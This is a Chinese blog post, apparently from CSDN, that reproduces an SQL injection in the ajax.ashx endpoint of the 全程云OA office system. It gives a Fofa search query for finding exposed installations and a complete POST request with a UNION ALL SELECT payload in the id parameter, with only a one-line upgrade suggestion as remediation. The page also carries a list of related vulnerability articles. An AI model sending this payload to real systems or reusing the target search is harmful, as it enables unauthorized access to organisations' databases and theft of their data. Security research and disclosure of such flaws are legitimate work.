【漏洞复现】全程云OA ajax.ashx SQL注入漏洞

已于 2024-06-19 05:05:16 修改
阅读量310 收藏 4
点赞数 6
分类专栏: 漏洞复现 文章标签: 渗透测试 web web安全 网络安全 漏洞 漏洞复现
于 2024-06-19 05:04:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/139730098
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业市场竞争能力。

漏洞描述

        全程云OA ajax.ashx 接口存在SQL注入漏洞,攻击者通过SQL注入可以获取服务器数据库敏感信息

网络空间会测

Fofa

"全程云OA" || "images/yipeoplehover.png"

image.png

漏洞复现

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Dnt: 1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: close

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT 1,'aaabbbcccdddeeefffggg',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- A

image.png

修复建议

升级到产品到最新版本

凝聚力安全团队
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
孚盟云 多处SQL注入漏洞复现
0xSec
01-19 745
由于孚盟云 AjaxMethod.ashxAjaxSendDingdingMessage.ashx等接口未对用户传入的参数进行合理的校验和过滤,导致传入的参数直接携带到数据库执行,导致SQL注入漏洞,未经身份验证的攻击者可通过此漏洞获取数据库权限,深入利用可获取服务器权限。
全程OA ajax.ashx SQL注入漏洞复现
0xSec
01-05 1104
​ 由于全程oa办公系统ajax.ashx页面参数过滤不当,导致存在sql注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息。
Web2.0十大Ajax安全漏洞以及成因
zgos的专栏
11-20 723
 JavaScript包含的AjaxWeb2.0应用的一个重要组成部分。该部分的进化发展使网络变成了超级平台。该转变同时也催生了新品种的病毒和蠕虫,比如Yamanner,Samy 以及Spaceflash等等。Google,Netflix,Yahoo 以及MySpace等门户网站在过去的几个月里都因为新的漏洞而蒙受一定损失。黑客们可以利用这些漏洞进行钓鱼,跨站点脚本(XSS)以及跨站点伪造(
详细分析开源软件项目 Ajax.NET Professional 中的RCE 漏洞(CVE-2021-23758)
smellycat000的专栏
01-19 1298
聚焦源代码安全,网罗国内外最新资讯!作者:Hans-Martin Münch编译:代码卫士2021年秋,MOGWAI LABS 实验室在为客户进行渗透测试过程中发现了开源组件 “Ajax...
JS敏感信息泄露:不容忽视的WEB漏洞
weixin_33755649的博客
03-08 833
我是小号 · 2015/07/07 11:000x00 前言这段时间jsonp漏洞再一次证明了一个微小的漏洞,经过攻击者的巧妙而持久的利用,也会对企业和用户造成巨大的危害。而本文将要介绍的JS泄露敏感信息问题也是如此,攻击者不仅可以轻松收集用户手机号,姓名等隐私信息,更可以借此攻入企业后台甚至是getshell。本文将通过一些公开和未公开的漏洞详细阐述此类漏洞。0x01 漏洞成因JavaScrip...
ajax漏洞 console_在实战中可能碰到的几种ajax请求方法详解
weixin_39715997的博客
12-23 519
前言最近在做一个针对单个节点测速的功能页面,测速的逻辑是,测上传速度时,前端传5m数据给server,记录上传和返回数据的时间,测下载速度时,从server下载1m的数据,记录下载和下载成功的时间,上传和下载用的是ajax同步以避免客户端带宽阻塞的问题,并进行3次取平均值。在开发过程过,因为ajax同步异步的问题,走了不少弯路,特地也把之前遇到的业务逻辑整理汇总一下。ajax请求方法如下一、普通的...
Jquery Ajax.ashx 高效分页实现代码
10-29
Jquery ,大家都熟悉的一个框架,我对Jquery正在学习中,对其影响最深的当属 它的选择器之强,ajax与服务器之间的交谈
upload_ajax.ashx
11-03
upload_ajax.ashx用于图片上传初始化,webuploader,kindeditor等
OpenFile.ashx
06-02
OpenFile.ashx
arcgis proxy.ashx,proxy.config
04-22
arcgis for javascript api所需要的配置文件,能解决跨域访问的问题,我在proxy....包含两个文件proxy.ashx,proxy.config两个文件,上次下载一个说是有两个文件,其实里面只有一个,有被骗了的感觉,所以这次上传上来
Ajax与跨站点请求伪造漏洞
03-22
Ajax与跨站点请求伪造漏洞,近日,我们的网站请微软的工程师作了一次漏洞扫描,扫描结果中有两个“跨站点请求伪造漏洞”。通过查资料,我做了一番研究,包括此漏洞的入侵条件,被攻击后的损失以及防范措施等。
腾讯某频道ajax存在注入漏洞
swordheart的博客
04-12 901
漏洞详情 披露状态: 2010-07-17: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 和之前的http://www.wooyun.org/bug.php?action=view&id=31 类似,注入点为ajax方法 详细说明: ajax
全程OASQL注入漏洞
waxcj的博客
01-06 393
20240106
(转)了解 Ajax 漏洞
weixin_30292843的博客
10-27 216
转载http://www.ibm.com/developerworks/cn/web/wa-vulnerabilities/index.html 简介 常用缩略词 Ajax:异步 JavaScript + XML CSS:层叠样式表 DOM:文档对象模型 HTML:超文本标记语言 JSON:JavaScript 对象表示法 SQL:结构化查询语言 UI:用户界面 ...
ajax在Xss中的利用,Ajax Web应用程序的XSS漏洞检测
weixin_32602879的博客
08-06 8377
摘要:Web2.0已成为目前网络上的热点技术,作为其核心技术的Ajax给用户带来了无刷新的网络快速浏览新体验。但是,临界于桌面应用程序的“胖客服端”与Web应用程序的“瘦客户端”机制,Ajax技术的使用造成web应用程序同时具备这两种客户端特点的安全威胁。一方面Ajax将部分逻辑转嫁到客户端相应的暴露程序的部分业务逻辑;另一方面与Web服务器的交互信息以及可能的匿名访问也存在着潜在的攻击利用价值。...
全程OA ajax.ashx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
01-08 479
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发全程办公自动化系统也是企事业单位的内部网,系统及时反映内部公告、通知、企业文化、学习讨论园地等。整体协同管理企业内部办公流程,从而使整个企业的内部办公可以跟上市场的变化,以加强内部管理为核心的思想,也是目前先进管理思想在软件工具中的体现。
复现】(day)全程OA SQL注入漏洞(下)_11
fushuang333的博客
01-07 851
复现】(day)全程OA SQL注入漏洞(下),攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
ashx文件 验证是否登录_Web文件上传漏洞小结
weixin_39562197的博客
11-22 573
在现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,然而向用户提供的功能越多,Web应用受到攻击的风险就越大,如果Web应用存在上传文件漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站权限。文件上传漏洞介绍在一般情况下,文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。要完成这个攻击,需要满足如下几个条件:上传...
requests库 调用.ashx接口
最新发布
06-05
requests是一个Python第三方库,它提供了一种简单且优雅的方式来发送HTTP/1.1请求,也支持发送文件、Cookie等。在使用requests库调用.ashx接口时,可以使用requests库的post方法,将需要传递的参数以字典形式传递给post方法,然后指定接口URL,即可向该接口发送POST请求。 示例代码如下所示: ```python import requests # 构造需要传递的参数 data = { 'param1': 'value1', 'param2': 'value2' } # 指定接口URL url = 'http://example.com/api.ashx' # 发送POST请求 response = requests.post(url, data=data) # 打印返回结果 print(response.text) ``` 需要注意的是,在使用requests库发送POST请求时,如果接口需要传递的参数不是通过URL参数传递,而是通过请求体传递,则需要将参数以字典形式传递给post方法的data参数。如果接口需要传递的参数是JSON格式,则可以将参数以字典形式传递给post方法的json参数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值